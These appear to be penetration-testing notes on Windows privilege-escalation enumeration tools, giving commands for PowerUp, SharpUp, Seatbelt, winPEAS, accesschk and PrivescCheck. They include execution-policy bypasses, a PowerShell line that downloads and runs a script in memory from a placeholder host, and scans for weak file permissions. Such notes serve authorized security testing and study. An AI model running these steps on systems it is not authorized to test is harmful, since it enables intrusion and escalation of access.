Automated enumeration script

PowerUp

wget https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1

To run PowerUp, start a PowerShell session and use dot sourcing to load the script:

CMD> powershell -exec bypass

PS> . .\PowerUp.ps1

PS> Invoke-AllChecks

# Run the Invoke-AllChecks function to start checking for common privilege escalation misconfigurations.

OR

C:\> powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://your-site.com/PowerUp.ps1'); Invoke-AllChecks"

SharpUp: (If Powershell is not available)

PowerUp & SharpUp are very similar tools that hunt for specific privilege escalation misconfigurations.

# Code: https://github.com/GhostPack/SharpUp

# Pre-Copiled: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/SharpUp.exe

To run SharpUp, start a command prompt and run the executable:

.\SharpUp.exe

Seatbelt

Seatbelt is an enumeration tool. It contains a number of enumeration checks.

It does not actively hunt for privilege escalation misconfigurations, but provides related information for further investigation.

# Code: https://github.com/GhostPack/Seatbelt

# Pre-Compiled: https://github.com/r3motecontrol/Ghostpa-CompiledBinaries/blob/master/Seatbelt.exe

To run all checks and filter out unimportant results:

.\Seatbelt.exe all

To run specific check(s):

.\Seatbelt.exe <check> <check>

winPEAS

winPEAS is a very powerful tool that not only actively hunts for privilege escalation misconfigurations, but highlights them for the user in the results.

# Code: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

Before running, we need to add a registry key and then reopen the command prompt:

reg add HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

Run all checks while avoiding time-consuming searches:

.\winPEASany.exe quiet cmd fast

Run specific check categories:

.\winPEASany.exe quiet cmd systeminfo

accesschk.exe

AccessChk is an old but still trustworthy tool for checking user access control rights.

You can use it to check whether a user or group has access to files, directories, services, and registry keys.

The downside is more recent versions of the program spawn a GUI “accept EULA” popup window. When using the command line, we have to use an older version which still has an /accepteula command line option.

https://xor.cat/assets/other/Accesschk.zip

Always do this first

accesschk.exe /accepteula (always do this first!!!!!)

Find all weak file permission per drive.

accesschk.exe -uwqs Users c:\*.*

accesschk.exe -uwqs "Authenticated Users" c:\*.*

Find all weak folder permission per drive

accesschk.exe -uwdqs Users c:\

accesschk.exe -uwdqs "Authenticated Users" c:\

PrivescCheck

This script aims to enumerate common Windows configuration issues that can be leveraged for local privilege escalation. It also gathers various information that might be useful for exploitation and/or post-exploitation.

C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
# From cmd

PS C:\Temp\> Set-ExecutionPolicy Bypass -Scope process -Force
PS C:\Temp\> . .\PrivescCheck.ps1; Invoke-PrivescCheck
# From powershell

C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended"
# By default, the scope is limited to vulnerability discovery but, you can get a lot more information with the -Extended option